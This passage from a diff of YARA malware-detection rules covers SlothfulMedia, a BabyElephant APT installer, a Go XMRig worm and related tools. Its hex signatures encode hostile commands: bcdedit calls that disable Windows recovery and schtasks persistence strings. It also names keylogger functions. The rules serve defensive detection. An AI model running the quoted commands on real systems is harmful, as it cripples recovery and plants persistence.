5a 48 4a 33 5a 48 4a 6d 5a 48 4e 30 5a 48 4e 69 5a 48 4e 72 5a 48 52 6b 5a 48 64 6d 5a 48 64 6e 5a 48 64 7a 5a 48 68 30 5a 48 68 34 5a 48 68 69 5a 48 68 6d 5a 48 68 6e 5a 57 31 73 5a 57 52 69 5a 58 42 72 5a 58 42 7a 5a 58 4a 6d 5a 58 4e 74 5a 58 68 6d 5a 6d 31 69 5a 6d 39 7a 5a 6d 4a 33 5a 6d 52 69 5a 6d 59 3d 5a 6d 5a 6b 5a 6d 5a 6d 5a 6d 67 3d 5a 6d 68 6b 5a 6d 78 32 5a 6d 78 68 5a 6d 78 6d 5a 6e 42 34 5a 6e 42 72 5a 6e 4a 74 5a 6e 4e 6f 5a 6e 56 73 5a 6e 68 6e 0a 09 6d 3d 5d }
-		$com1 = "os/exec.(*Cmd).Run" fullword ascii
-		$com2 = "os/exec.(*Cmd).Start" fullword ascii
-		$com3 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 31 2e 76 62 73 43 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c 73 32 2e 76 62 73 43 }
-		$str1 = { 63 6d 64 7a 63 7a 4e 68 63 73 }
-		$str2 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 69 62 32 39 30 63 33 52 68 64 48 56 7a 63 47 39 73 61 57 4e 35 49 47 6c 6e 62 6d 39 79 5a 57 46 73 62 47 5a 68 61 57 78 31 63 6d 56 7a }
-		$str3 = { 59 32 31 6b 4c 6d 56 34 5a 53 41 76 59 79 42 69 59 32 52 6c 5a 47 6c 30 4c 6d 56 34 5a 53 41 76 63 32 56 30 49 48 74 6b 5a 57 5a 68 64 57 78 30 66 53 42 79 5a 57 4e 76 64 6d 56 79 65 57 56 75 59 57 4a 73 5a 57 51 67 62 6d 38 3d }
+		$str1 = { 48 61 6e 64 73 68 61 6b 69 6e 67 20 77 69 74 68 20 25 73 2e 2e 2e }
+		$str2 = { 4c 65 74 73 45 6e 63 72 79 70 74 20 63 61 63 68 65 20 64 69 72 65 63 74 6f 72 79 20 25 73 }
+		$str3 = { 65 6e 63 6f 64 65 20 65 72 72 6f 72 3a 20 25 77 }
+		$str4 = { 28 65 72 72 6f 72 20 25 73 29 }
+		$str5 = { 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 63 6c 69 65 6e 74 20 63 65 72 74 20 61 6e 64 20 6b 65 79 20 70 61 69 72 3a 20 25 76 }
+		$str6 = { 4c 69 73 74 65 6e 69 6e 67 20 6f 6e 20 25 73 3a 2f 2f 25 73 3a 25 73 25 73 }
+		$str7 = { 46 61 69 6c 65 64 20 74 6f 20 64 65 63 6f 64 65 20 50 45 4d 3a 20 25 73}
+		$str8 = { 43 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 28 25 73 29 }
+		$str9 = { 70 72 6f 78 79 23 25 73 }
+		$seq1 = { 48 89 05 5a 96 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 3c 67 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 05 fd ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d d7 b4 40 00 48 89 15 d8 b4 40 00 83 3d 41 0d 45 00 00 90 0f 85 b5 0b 00 00 48 89 05 b3 b4 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 50 eb 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d d2 0c 45 00 00 0f 85 36 0b 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 e3 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da b2 40 00 48 89 15 db b2 40 00 83 3d 64 0c 45 00 00 0f 1f 40 00 0f 85 b0 0a 00 00 48 89 05 b3 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ee 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d f2 0b 45 00 00 0f 85 31 0a 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 04 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b3 40 00 48 89 15 5b b3 40 00 83 3d 84 0b 45 00 00 0f 1f 40 00 0f 85 aa 09 00 00 48 89 05 33 b3 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 0f 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 12 0b 45 00 00 0f 85 2b 09 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 25 e9 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b2 40 00 48 89 15 5b b2 40 00 83 3d a4 0a 45 00 00 0f 1f 40 00 0f 85 a8 08 00 00 48 89 05 33 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b4 e8 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 08 b1 40 00 48 89 15 09 b1 40 00 83 3d 32 0a 45 00 00 0f 85 29 08 00 00 48 89 05 e5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 21 64 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 88 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a af 40 00 48 89 15 5b af 40 00 83 3d c4 09 45 00 00 0f 1f 40 00 0f 85 a6 07 00 00 48 89 05 33 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 16 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 52 09 45 00 00 0f 85 27 07 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 45 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 a8 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 9a af 40 00 48 89 15 9b af 40 00 83 3d e4 08 45 00 00 0f 1f 40 00 0f 85 a4 06 00 00 48 89 05 73 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 36 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 72 08 45 00 00 0f 85 22 06 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 69 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 c8 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ad 40 00 48 89 15 fb ad 40 00 83 3d 04 08 45 00 00 0f 1f 40 00 0f 85 9f 05 00 00 48 89 05 d3 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 56 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d 92 07 45 00 00 0f 85 1c 05 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 8d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 e8 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 7a ad 40 00 48 89 15 7b ad 40 00 83 3d 24 07 45 00 00 0f 1f 40 00 0f 85 99 04 00 00 48 89 05 53 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 76 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d b2 06 45 00 00 0f 85 1a 04 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 08 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d ba ab 40 00 48 89 15 bb ab 40 00 83 3d 44 06 45 00 00 0f 1f 40 00 0f 85 97 03 00 00 48 89 05 93 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 41 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d d2 05 45 00 00 0f 85 18 03 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 f5 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ab 40 00 48 89 15 fb ab 40 00 83 3d 64 05 45 00 00 0f 1f 40 00 0f 85 95 02 00 00 48 89 05 d3 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 65 5f 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ad 40 00 48 89 15 29 ad 40 00 83 3d f2 04 45 00 00 0f 85 16 02 00 00 48 89 05 05 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 f4 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a aa 40 00 48 89 15 5b aa 40 00 83 3d 84 04 45 00 00 0f 1f 40 00 0f 85 90 01 00 00 48 89 05 33 aa 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 89 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 12 04 45 00 00 0f 85 11 01 00 00 48 89 05 05 ab 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 5e 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 f3 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da a9 40 00 48 89 15 db a9 40 00 83 3d a4 03 45 00 00 0f 1f 40 00 0f 85 89 00 00 00 48 89 05 b3 a9 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ad 5d 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f2 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 28 ab 40 00 48 89 15 29 ab 40 00 83 3d 32 03 45 00 00 }
+		$seq2 = { 48 c7 40 70 00 00 00 00 48 8b 48 08 48 89 0c 24 e8 01 47 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 70 e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 9b 6d ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 4a e1 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 48 89 0c 24 e8 75 6d ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 41 4e fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 9c 17 00 00 0f 57 c0 0f 11 84 24 18 02 00 00 0f 11 84 24 28 02 00 00 0f 11 84 24 38 02 00 00 48 8b 84 24 b8 04 00 00 48 8b 88 b0 00 00 00 48 8b 11 48 8b 59 08 48 8b 49 10 48 89 94 24 30 02 00 00 48 89 9c 24 38 02 00 00 48 89 8c 24 40 02 00 00 48 8d 8c 24 18 02 00 00 48 89 0c 24 e8 2d a2 ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 90 e8 7b e0 00 00 48 8d 84 24 18 02 00 00 48 89 04 24 e8 0a a2 ff ff 48 8b 44 24 08 48 8b 4c 24 10 48 8b 54 24 18 48 8b 9c 24 80 01 00 00 48 89 1c 24 c6 44 24 08 16 48 89 44 24 10 48 89 4c 24 18 48 89 54 24 20 e8 76 4d fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 66 0f 1f 44 00 00 0f 85 ab 16 00 00 48 8b 84 24 b8 04 00 00 48 8b 48 10 80 79 53 00 0f 85 a9 15 00 00 48 8b 48 18 48 8b 51 20 48 8b 0a 48 8b 9c 24 80 01 00 00 0f b7 73 40 66 89 34 24 ff d1 48 8b 44 24 08 48 89 84 24 f8 00 00 00 48 8b 4c 24 10 48 89 8c 24 38 01 00 00 48 8b 58 20 48 8b b4 24 80 01 00 00 48 8b 7e 48 4c 8b 84 24 b8 04 00 00 4d 8b 88 b0 00 00 00 4d 8b 50 08 4d 8b 58 10 48 89 0c 24 48 89 7c 24 08 4c 89 4c 24 10 4c 89 54 24 18 4c 89 5c 24 20 ff d3 48 8b 44 24 28 48 8b 4c 24 30 48 8b 5c 24 38 48 83 7c 24 30 00 0f 85 c0 14 00 00 48 85 c0 0f 84 93 00 00 00 48 89 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 7b 13 00 00 48 8b 84 24 c0 01 00 00 48 89 04 24 48 89 4c 24 08 48 89 54 24 10 48 89 5c 24 18 e8 2c df 00 00 48 8b 84 24 30 01 00 00 48 8b 08 48 8b 50 08 48 8b 58 10 48 85 c9 0f 84 21 12 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 c6 44 24 08 16 48 89 4c 24 10 48 89 54 24 18 48 89 5c 24 20 e8 2b 4c fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 c6 11 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 90 0f 8d 0b 10 00 00 31 c9 48 89 8c 24 78 01 00 00 48 8d 05 e9 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 4e cd e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 c0 01 00 00 48 89 0c 24 48 89 44 24 08 48 c7 44 24 10 04 00 00 00 48 c7 44 24 18 04 00 00 00 0f 1f 00 e8 5b de 00 00 48 8d 05 94 5c 24 00 48 89 04 24 48 c7 44 24 08 04 00 00 00 48 c7 44 24 10 04 00 00 00 e8 f9 cc e2 ff 48 8b 44 24 18 c6 00 0e 48 8b 8c 24 80 01 00 00 48 89 0c 24 c6 44 24 08 16 48 89 44 24 10 48 c7 44 24 18 04 00 00 00 48 c7 44 24 20 04 00 00 00 e8 44 4b fe ff 48 8b 44 24 30 48 8b 4c 24 38 48 83 7c 24 30 00 0f 85 1f 0f 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 66 90 e8 bb 43 fe ff 48 8b 44 24 10 48 8b 4c 24 18 48 83 7c 24 10 00 0f 85 d6 0e 00 00 48 8b 84 24 80 01 00 00 48 89 04 24 e8 34 4c fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 10 48 8b 5c 24 10 48 8b 74 24 08 48 8b 7c 24 08 48 83 7c 24 18 00 0f 85 7b 0e 00 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 83 b9 90 00 00 00 01 0f 8c 55 0e 00 00 48 8d 0d e9 3f 26 00 66 0f 1f 84 00 00 00 00 00 48 39 cf 0f 85 30 0e 00 00 48 89 94 24 b8 01 00 00 0f 85 4f 0d 00 00 48 89 14 24 0f 1f 44 00 00 e8 db 9e ff ff 48 8b 84 24 c0 01 00 00 48 89 04 24 e8 2a dd 00 00 48 c7 84 24 80 03 00 00 00 00 00 00 48 8d bc 24 88 03 00 00 0f 57 c0 48 8d 7f f0 66 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 de c6 e4 ff 48 8b 6d 00 48 8b 84 24 b8 01 00 00 48 8b 48 18 48 8b 50 20 48 8b 58 28 48 89 8c 24 80 03 00 00 48 89 94 24 88 03 00 00 48 89 9c 24 90 03 00 00 48 8b 8c 24 80 01 00 00 48 89 0c 24 48 8b 94 24 80 03 00 00 48 89 54 24 08 48 8d 7c 24 10 48 8d b4 24 88 03 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 ca c9 e4 ff 48 8b 6d 00 e8 43 27 00 00 48 8b 84 24 80 00 00 00 48 8b 8c 24 88 00 00 00 48 83 bc 24 80 00 00 00 00 0f 85 4a 0c 00 00 48 8b 94 24 b8 01 00 00 48 83 7a 20 00 0f 84 26 0c 00 00 48 8b 94 24 80 01 00 00 48 8b 8a 98 00 00 00 48 8b 9a 90 00 00 00 48 85 c9 0f 86 7e 13 00 00 48 8b 03 48 8b 88 a0 00 00 00 48 8b 80 a8 00 00 00 48 89 8c 24 f0 00 00 00 48 89 84 24 20 01 00 00 48 89 14 24 e8 88 4a fe ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 08 48 8b 5c 24 10 48 83 7c 24 18 00 0f 85 9d 0b 00 00 48 8b 84 24 f0 00 00 00 48 8b 8c 24 20 01 00 00 48 89 94 24 00 01 00 00 48 89 8c 24 20 01 00 00 48 89 84 24 f0 00 00 00 48 89 9c 24 40 01 00 00 48 8b b4 24 80 01 00 00 48 8b 7e 48 48 83 }
+		$seq3 = { 48 89 34 24 e8 65 6c fe ff 48 8d bc 24 f8 03 00 00 48 8d 74 24 08 48 89 6c 24 f0 48 8d 6c 24 f0 e8 2f be e4 ff 48 8b 6d 00 48 8b 84 24 80 01 00 00 48 8b 48 48 48 8b 51 58 48 8b 0a 48 89 e7 48 8d b4 24 f8 03 00 00 0f 1f 80 00 00 00 00 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f7 bd e4 ff 48 8b 6d 00 ff d1 48 8b 84 24 b0 00 00 00 48 8b 8c 24 b8 00 00 00 48 83 bc 24 b0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 600KB and $seq and 2 of ( $com* ) and 2 of ( $str* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 2 of ( $seq* ) and 7 of ( $str* )
 }
-rule ARKBIRD_SOLG_Tool_Screencapture_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Babyelephant_Installer_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect Screen Capture utility"
+		description = "Detect Installer from BabyElephant APT"
 		author = "Arkbird_SOLG"
-		id = "09e4295e-454a-519a-964e-c5295e603aef"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/Tool_ScreenCapture_Jul_2021_1.yara#L1-L19"
+		id = "c89a127d-af49-597e-927d-c9a10c90fabe"
+		date = "2021-02-23"
+		modified = "2021-02-23"
+		reference = "https://twitter.com/h2jazi/status/1363683531067715584"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/BabyElephant/APT_BabyElephant_Installer_Feb_2021_1.yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "dff6c722ec001f5e3b5c53b41f8d457ab69ae46316f5dc7bbf1d00eb3d1ed3c8"
-		score = 75
+		logic_hash = "7c4f2cd7e56426e42141b1f2f3a13e1daa01b1de1fe88f4bd135601234407ec9"
+		score = 50
 		quality = 73
 		tags = "FILE"
-		hash1 = "f441e6239b592ac15538a8ba8903e5874283b066050a5a7e514ce33e84237f4e"
-		tlp = "White"
-		adversary = "IAmTheKing"
+		level = "experimental"
+		hash1 = "d55ff954abb04ec29745f7d80ea7457a862c8025a21e889f1ba44c32ba486a7e"
 
 	strings:
-		$s1 = "@MyScreen.jpg" fullword wide
-		$s2 = "DISPLAY" fullword wide
-		$s3 = "_invoke_watson" fullword ascii
-		$s4 = "GdipSaveImageToStream" fullword ascii
-		$s5 = { 8b 57 04 89 4d e8 8d 4d e8 51 52 e8 16 0c 00 00 85 c0 74 03 89 47 08 8b 75 e8 81 fe 00 04 00 00 77 18 56 e8 ac f9 ff ff 83 c4 04 84 c0 74 0b 8b c6 e8 9e 15 00 00 8b f4 eb 35 83 c8 ff 2b c6 83 f8 08 72 15 8d 46 08 50 ff 15 f4 30 40 00 83 c4 04 85 }
+		$s1 = { 65 63 68 6f 20 25 64 20 3e 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 65 6d 70 5c }
+		$s2 = "COMSPEC" fullword ascii
+		$s3 = { 53 43 48 54 41 53 4b 53 20 2f 43 52 45 41 54 45 20 2f 53 43 20 4d 49 4e 55 54 45 20 2f 4d 4f 20 [1-3] 20 2f 54 4e 20 22 [1-12] 22 20 2f 54 52 20 22 [4-24] 22 20 2f 66 }
+		$s4 = "%s//%s" fullword ascii
+		$s5 = { 53 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 54 4e 20 22 [1-12] 22 20 2f 66 }
+		$s6 = { 83 c4 10 8b d8 e8 13 02 00 00 83 fb ff 74 06 89 38 8b f3 eb 34 83 38 02 74 0f e8 fe 01 00 00 83 38 0d 74 05 83 ce ff eb 20 e8 ef 01 00 00 89 38 56 8d 45 ec b9 c4 3e 42 00 50 51 56 89 4d ec }
+		$s7 = { 68 00 08 00 00 8d 85 48 f6 ff ff 6a 00 50 e8 00 33 00 00 83 c4 0c 8d 85 48 f6 ff ff 6a 00 68 00 08 00 00 50 53 ff d6 85 c0 0f 8e 1f 03 00 00 0f 1f 40 00 6a 08 68 e0 b3 42 00 8d 8d 28 ec ff ff c7 85 38 ec ff ff 00 00 00 00 c7 85 3c ec ff ff 0f 00 00 00 c6 85 28 ec ff ff 00 e8 a3 09 00 00 8d 95 28 ec ff ff c7 45 fc 00 00 00 00 8d 8d 10 ec ff ff e8 2b 05 00 00 83 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( filesize > 8KB and filesize < 60KB ) and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 80KB and all of them
 }
-rule ARKBIRD_SOLG_MAL_Slothfulmedia_Jul_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_ELF_Go_Worm_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect SlothfulMedia malware"
+		description = "Detect the worm written in Go that drops XMRig Miner"
 		author = "Arkbird_SOLG"
-		id = "f4e1eca6-ecc9-5911-b69e-c8c4de43f1a1"
-		date = "2021-07-09"
-		modified = "2021-07-12"
-		reference = "hhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_SlothfulMedia_Jul_2021_1.yara#L1-L26"
+		id = "6f4a9d3a-e038-5d7f-9c18-c380a0b295d2"
+		date = "2021-07-06"
+		modified = "2021-07-06"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1409848815948111877"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-06/MAL_ELF_Go_Worm_Jul_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "929364cbb9854336641590d53ee9c4548f02845e26252d359b155e4c2b1032ca"
+		logic_hash = "be8b95f8aab62d3a2b3376a0481ebc609afcd089e0613d39f258e07366b708a1"
 		score = 75
-		quality = 73
+		quality = 61
 		tags = "FILE"
-		hash1 = "04ca010f4c8997a023fabacae230698290e3ff918a86703c5e0a2a6983b039eb"
-		hash2 = "927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae"
-		hash3 = "ed5258306c06d6fac9b13c99c7c8accc7f7fa0de4cf4de4f7d9eccad916555f5"
+		hash1 = "774ccd1281b02bc9f0c7e7185c424a42cd98bcc758c893e8a96dfb206a02fcbe"
+		hash2 = "bea5a4358184555924ab6c831bf34edf279f4b93d750d5321263439dcf9c245a"
 		tlp = "White"
-		adversary = "IAmTheKing"
+		adversary = "-"
 
 	strings:
-		$s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e }
-		$s2 = "\\VarFileInfo\\Translation" fullword wide
-		$s3 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 }
-		$s4 = "\\SetupUi" fullword wide
-		$s5 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 }
-		$s6 = { 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 25 00 73 00 25 00 64 }
-		$s7 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 }
-		$s8 = { 45 00 72 00 61 00 20 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3a 00 25 00 73 00 20 00 25 00 64 }
-		$s9 = "ExtKeyloggerStart" fullword ascii
-		$s10 = "ExtKeyloggerStop" fullword ascii
